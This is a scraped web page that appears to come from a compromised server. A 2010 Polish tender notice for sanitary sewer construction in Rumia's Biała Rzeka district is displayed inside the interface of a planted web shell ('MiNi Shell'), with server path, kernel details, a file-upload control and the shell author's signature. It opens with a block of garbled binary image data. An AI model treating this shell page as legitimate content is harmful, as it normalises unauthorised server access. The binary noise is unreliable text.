JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100921/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100921/259277-N-2010.html

<p class="kh_header"><b>Rumia: Budowa kanalizacji sanitarnej w dzielnicy Biała Rzeka w Rumi - etap II</b><br>
<b>Numer ogłoszenia: 259277 - 2010; data zamieszczenia: 21.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Rumia , ul. Sobieskiego 7/204, 84-230 Rumia, woj. pomorskie, tel. 058 6719410, faks 058 6796517.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.rumia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej w dzielnicy Biała Rzeka w Rumi - etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Budowa kanalizacji sanitarnej w dzielnicy Biała Rzeka w Rumi - etap II zgodnie z projektami: Budowa kanalizacji sanitarnej w Rumi, dz. Biała Rzeka z przyłączami, przepompownią ścieków, rurociągiem tłocznym i doprowadzeniem wody do przepompowni - etap II a, b, c, w rejonie ulic: Grunwaldzka - Kosynierów - Dolna; Budowa kanalizacji sanitarnej w Rumi, dz. Biała Rzeka etap II w rejonie ulicy Grunwaldzkiej - przekroczenia drogi krajowej nr 6 oraz lokalizacji kanałów w pasie drogi krajowej nr 6; Budowa przyłącza kanalizacji sanitarnej do działki nr 149/8 w Rumi; Budowa przyłącza energetycznego nn-0,4 kV oraz instalacji wewnętrznej do zasilania przepompowni PS-4A wraz z rysunkiem zamiennym , a także  Przebudowa sieci teletechnicznej NETIA S.A. i TP S.A. w rejonie ulicy Grunwaldzkiej na działkach o numerach ewidencyjnych: 142/1, 141/1, 140/7, 140/5, 124/3 - Obr. 1.
2.  Zakres prac  obejmuje wykonanie następujących robót:
2.1 Budowa sieci kanalizacji sanitarnej z przyłączami do granic posesji objętej etapami II a, b, c, w tym:
       1) budowa przepompowni ścieków PS-4A;
       2) budowa rurociągu tłocznego;
       3) doprowadzenie wody do przepompowni PS-4A;
       4) roboty nawierzchniowe na terenie przepompowni;
       5) budowa ogrodzenia przepompowni;
       6) budowa drogi eksploatacyjnej do przepompowni - 80 mb;
       7) budowa sieci kanalizacji sanitarnej w ciągach niżej wymienionych ulic wraz z przyłączami: 
           a) ul. Owsiana,
           b) ul. Grunwaldzka,
           c) ul. G. Zapolskiej, 
           d) ul. Żytnia oraz utwardzenie nawierzchni drogowej na odcinku od  ul. Grunwaldzkiej do  wysokości przepompowni 
              -  160 mb.,
           e) ul. Gniewowska,
           f) ul. Grottgera,
           g) ul. Kossaka na odcinku od wys. dz. Nr 16/2 do wys. dz. Nr 65/8,
           h) ul. Dunikowskiego,
           i)  ul. Hetmańska
           j)  ul. Herberta,
           k) ul. Kasprowicza, 
       8) budowa sieci kanalizacji sanitarnej z przyłączami na działkach łączących w/w ciągi ulic.
2.2 Budowa przyłącza elektroenergetycznego nn-0,4 kV i instalacją wewnętrzną do zasilania przepompowni PS-4A;
2.3 Przebudowa sieci teletechnicznej NETIA S.A. i TP S.A.;
2.4 Wykonanie dwóch przewiertów pod drogą krajową nr 6 - ul. Grunwaldzka;
2.5 Budowa przyłącza kanalizacji sanitarnej do działki nr 149/8 obr. 1;
2.6 Wykonanie projektu organizacji ruchu oraz jego realizacja w trakcie budowy;
2.7 Zagospodarowanie terenów zielonych.
3. Kolejność realizacji poszczególnych etapów zamówienia:
    1) rok 2010 
        a) rozpoczęcie realizacji zakresu określonego w ust. 2 pkt  2.1 ppkt 1-6 oraz pkt., 2.2;
        b) rozpoczęcie w pierwszej kolejności realizacji zakresu określonego w  pkt. 2.3, pkt. 2.4, części  zakresu określonego w ust. 2 pkt. 
            2.1  ppkt  7 t.j.: budowa kanalizacji sanitarnej w ul. Owsianej, ul. G. Zapolskiej, ul. Żytniej i ul. Grunwaldzkiej (wraz z 
            utwardzeniem  nawierzchni ul. Żytniej) oraz  rozpoczęcie  realizacji zakresu określonego w pkt. 2.6;

        (UWAGA: szczegółowy zakres budowy sieci określony wstępnie w pkt 1 ppkt. b doprecyzowany zostanie po rozstrzygnięciu
        niniejszego postępowania w zależności od ceny oferty i posiadanych środków finansowych);  
  
  UWAGA: Maksymalna kwota jaką Zamawiający przeznaczył w roku 2010 na płatność za realizację powyższego zakresu określonego 
                w ust. 2 pkt 2.1 ppkt 7 a-d  oraz pkt. 2.3  i 2.4 wynosi  1.100.000 zł brutto.  
               Zakres robót opisany powyżej w ust. 2 pkt 2.1 ppkt  1-6 oraz ust. 2 pkt 2.2  opłacony będzie bezpośrednio przez PEWIK
               GDYNIA  Sp. z o.o.  lub  wspólnie z Gminą Miejską Rumia, w zależności od ceny ofertowej  obejmującej ten zakres  robót.
    2) Rok 2011:
        a) zakończenie realizacji zakresu określonego w ust. 2 pkt  2.1 ppkt 1-6 oraz pkt., 2.2;
        b) zakończenie realizacji zakresu określonego w ust. 2 pkt 2.1 ppkt 7 a-k oraz ppkt 8. 
            UWAGA: Maksymalna kwota jaką Zamawiający przeznaczył w roku 2011 na płatność za  realizację  powyższego zakresu wynosi
                         1.000.000 zł. brutto.  Pierwsza płatność za roboty ewentualnie zrealizowane a nie zapłacone w 2010 r.  oraz roboty 
                          realizowane w 2011 r. - płatne od m-ca maja  2011 roku.

    3) Rok 2012:
        - realizacja zakresu określonego w ust. 2 pkt. 2.7 oraz dokończenia zakresu określonego w ust. 2 pkt 2.6  

            UWAGA: Maksymalna kwota jaką Zamawiający przeznaczył w roku 2012 na płatność za  realizację powyższego zakresu oraz za
                          roboty ewentualnie zrealizowane a nie  zapłacone  w  2011 r.  wynosi 787.000 zł brutto. Pierwsza płatność za roboty 
                          ewentualnie zrealizowane a nie zapłacone w 2011 r.  oraz roboty realizowane w 2012 r. - płatne od m-ca kwietnia
                          2012 roku.
4.     W zależności od sytuacji finansowej gminy lub/i ceny wybranej oferty, terminy płatności za  zrealizowane roboty mogą ulec przyspieszeniu.    
UWAGA: Dokumentacja projektowa zawiera nazwy producentów, nazwy urządzeń i materiałów, typy itp. Zamawiający dopuszcza zastosowanie innych równoważnych urządzeń i materiałów, pod warunkiem, że ich parametry (potwierdzone np. kartami produktów) będą nie gorsze od przewidzianych w dokumentacji projektowej. Przed ich zastosowaniem niezbędna będzie zgoda projektantów. 

UWAGA: Przy kalkulowaniu ceny oferty należy wziąć pod uwagę, że:
1) w projekcie budowlano-wykonawczym branży sanitarnej na rysunkach sieci dla etapu II a - zaznaczone są kolorem pomarańczowym, dla sieci etapu II b - zaznaczone kolorem żółtym, dla etapu II c - kolorem niebieskim. Nie należy uwzględniać sieci zaznaczonych kolorem różowym, które będą realizowane w etapie II d w odrębnym postępowaniu;
2) w Specyfikacjach technicznych branży sanitarnej nie należy uwzględniać Specyfikacji Technicznej nr ST-01.01 dotyczącej robót rozbiórkowych;
3) z przedmiarów nie należy uwzględniać części 4 czyli odcinka II d;
4) cena oferty powinna obejmować koszt przeprowadzenia pozytywnego rozruchu przepompowni ścieków.
5) nawierzchnia (tymczasowa) ul. Żytniej ma być wykonana z płyt  żelbetowych ażurowych typu Yomb. Szerokość nawierzchni  3 mb,    długość 160 mb  wykonana na podbudowie z kruszywa 0 -31 zagęszczonej mechanicznie i grubości 20 cm..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia w okresie 3 lat od udzielenia zamówienia podstawowego dotychczasowemu Wykonawcy robót budowlanych zamówień uzupełniających, stanowiących nie więcej niż 20 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień i jest zgodne z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 100000 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie niezbędnej wiedzy i doświadczenia lub poleganie na wiedzy i doświadczeniu innych podmiotów.  Wykonawcy powinni udokumentować posiadanie wiedzy i doświadczenia poprzez realizację robót budowlanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a  jeżeli okres prowadzenia działalności  jest krótszy - w tym okresie z podaniem ich rodzaju i wartości, daty i miejsca wykonania , tj wykonaniu co najmniej dwóch kontraktów na budowę kanalizacji sanitarnej o długości  minimum 4.000 m oraz co najmniej jedną przepompownią.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia: - Wykonawcy winni udokumentować, że dysponują lub będą dysponowali osobami, które będą uczestniczyć w wykonaniu  zamówienia, tj. minimum jedną osobą z odpowiednimi uprawnieniami  i wpisaną na listę  członków właściwej izby zgodnie z art. 12 ustawy  z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. Nr 156 z 2006 r.  poz. 1118 ze zm.), do obsadzenia stanowiska kierownika budowy, która powinna posiadać uprawnienia sanitarne do kierowania robotami budowlanymi,  a także osobami z odpowiednimi uprawnieniami do kierowania robotami w branży elektrycznej, telekomunikacyjnej i drogowej oraz  wpisanymi na listę członków właściwej izby</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować, że znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia lub polegają na zdolnościach finansowych innych podmiotów tj.; 
               a) wniosą wymagane wadium,
                 b)są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie niższą niż 1.000.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmianę terminów wykonania umowy w przypadku zaistnienia następujących okoliczności: dopuszcza się zmianę terminów wykonania umowy,  zawartych W SIWZ oraz  w projekcie  umowy, w przypadku zaistnienia następujących okoliczności:
1) wystąpienie kolizji nieprzewidzianej w projekcie i uniemożliwiającej  kontynuację robót;
2) wystąpienia niesprzyjających warunków atmosferycznych powodujących wstrzymanie wykonywanie jakichkolwiek robót przez okres co
     najmniej dwóch tygodni;
3)  wystąpienia wad lub braków w  dokumentacji projektowej;  
4)  wystąpienia zmian dokumentacji projektowej;
5)  w przypadku wystąpienia robót dodatkowych i/lub zamiennych; 
6)  wystąpienia siły wyższej;
7) opóźnień Zamawiającego w zakresie dokonywania odbiorów; 
8) odmowy wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych 
    przez Wykonawcę; 
9) zmian spowodowanych nieprzewidzianymi w SIWZ warunkami geologicznymi, archeologicznymi lub terenowymi, w szczególności: 
    niewypały i niewybuchy, wykopaliska archeologiczne, ekshumacje zwłok, itp.
10) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności.
11) wystąpienia opóźnień z przyłączeniem przepompowni do sieci energetycznej ENERGII-OPERATORA S.A. leżących po stronie 
      właściciela sieci;
12) wystąpienia sprzyjającej sytuacji finansowej Gminy Miejskiej Rumia,  umożliwiającej przyspieszenie realizacji zakresów robót 
       w stosunku do zakresów rozpisanych na lata 2010 - 2012 w SIWZ w Rozdziale I ust. 3.
Pozostałe dopuszczalne zmiany postanowień umowy dotyczące zmiany wynagrodzenia zawarte są w § 17 projektu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.rumia.pl (zamówienia publiczne - przetargi aktualne)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Rumi, 84-230 Rumia, ul. Sobieskiego 7, pok. 213..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.10.2010 godzina 12:30, miejsce: Urząd Miasta Rumi, 84-230 Rumia, ul. Sobieskiego 7, pok. 204..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inne dokumenty lub oświadczenia:
1) wypełniony formularz ofertowy wg wzoru określonego w załączniku nr 1;
2)  Wykonawca, który zaproponuje zastosowanie innych równoważnych urządzeń i materiałów w stosunku do  określonych 
     w dokumentacji projektowej, zobowiązany jest do załączenia do oferty dokumentów (np. karty produktów) dla zaproponowanych
     urządzeń i materiałów, potwierdzających, że ich parametry są nie gorsze od parametrów urządzeń i materiałów opisanych 
     w projekcie;
3)  wybrany Wykonawca przed podpisaniem umowy przedstawi szczegółowy kosztorys ofertowy.


Inwestycja prowadzona jest przez Gminę Miejską Rumia, działającą w imieniu własnym oraz na podstawie art. 16 ust. 1 ustawy Prawo zamówień publicznych, na mocy upoważnienia, w imieniu i na rzecz Przedsiębiorstwa Wodociągów i Kanalizacji Sp. z o.o. w Gdyni, 81-311 Gdynia, ul. Witomińska 29, (zwanego w treści PEWIK GDYNIA Sp. z o.o.) współfinansującego budowę przepompowni ścieków PS-4A wraz z rurociągiem tłocznym i doprowadzeniem wody do przepompowni oraz budowę przyłącza energetycznego nn 0,4 kV i instalacji wewnętrznej do zasilania przepompowni PS-4A..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com